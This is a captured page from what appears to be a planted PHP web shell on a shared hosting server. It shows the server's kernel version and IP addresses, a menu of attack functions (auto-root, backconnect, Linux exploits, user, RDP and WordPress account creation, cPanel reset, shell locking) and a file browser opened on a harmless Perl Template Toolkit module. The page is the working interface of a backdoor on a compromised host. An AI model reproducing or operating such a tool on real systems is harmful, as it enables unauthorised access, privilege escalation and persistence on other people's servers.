Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
local /
lib64 /
perl5 /
Template /
Plugin /
[ HOME SHELL ]
Name
Size
Permission
Action
Assert.pm
3.43
KB
-r--r--r--
Datafile.pm
4.4
KB
-r--r--r--
Date.pm
11.22
KB
-r--r--r--
Directory.pm
10.9
KB
-r--r--r--
Dumper.pm
3.66
KB
-r--r--r--
File.pm
10.92
KB
-r--r--r--
Filter.pm
9.63
KB
-r--r--r--
Format.pm
1.79
KB
-r--r--r--
HTML.pm
5.87
KB
-r--r--r--
Image.pm
11.43
KB
-r--r--r--
Iterator.pm
1.95
KB
-r--r--r--
Math.pm
3.99
KB
-r--r--r--
Pod.pm
1.61
KB
-r--r--r--
Procedural.pm
3.59
KB
-r--r--r--
Scalar.pm
3.67
KB
-r--r--r--
String.pm
17.69
KB
-r--r--r--
Table.pm
12.41
KB
-r--r--r--
URL.pm
5.67
KB
-r--r--r--
View.pm
2.4
KB
-r--r--r--
Wrap.pm
3.18
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Format.pm
#============================================================= -*-Perl-*- # # Template::Plugin::Format # # DESCRIPTION # # Simple Template Toolkit Plugin which creates formatting functions. # # AUTHOR # Andy Wardley <abw@wardley.org> # # COPYRIGHT # Copyright (C) 1996-2022 Andy Wardley. All Rights Reserved. # # This module is free software; you can redistribute it and/or # modify it under the same terms as Perl itself. # #============================================================================ package Template::Plugin::Format; use strict; use warnings; use base 'Template::Plugin'; our $VERSION = '3.100'; sub new { my ($class, $context, $format) = @_;; return defined $format ? make_formatter($format) : \&make_formatter; } sub make_formatter { my $format = shift; $format = '%s' unless defined $format; return sub { my @args = @_; push(@args, '') unless @args; return sprintf($format, @args); } } 1; __END__ =head1 NAME Template::Plugin::Format - Plugin to create formatting functions =head1 SYNOPSIS [% USE format %] [% commented = format('# %s') %] [% commented('The cat sat on the mat') %] [% USE bold = format('<b>%s</b>') %] [% bold('Hello') %] =head1 DESCRIPTION The format plugin constructs sub-routines which format text according to a C<printf()>-like format string. =head1 AUTHOR Andy Wardley E<lt>abw@wardley.orgE<gt> L<http://wardley.org/> =head1 COPYRIGHT Copyright (C) 1996-2022 Andy Wardley. All Rights Reserved. This module is free software; you can redistribute it and/or modify it under the same terms as Perl itself. =head1 SEE ALSO L<Template::Plugin> =cut # Local Variables: # mode: perl # perl-indent-level: 4 # indent-tabs-mode: nil # End: # # vim: expandtab shiftwidth=4:
Close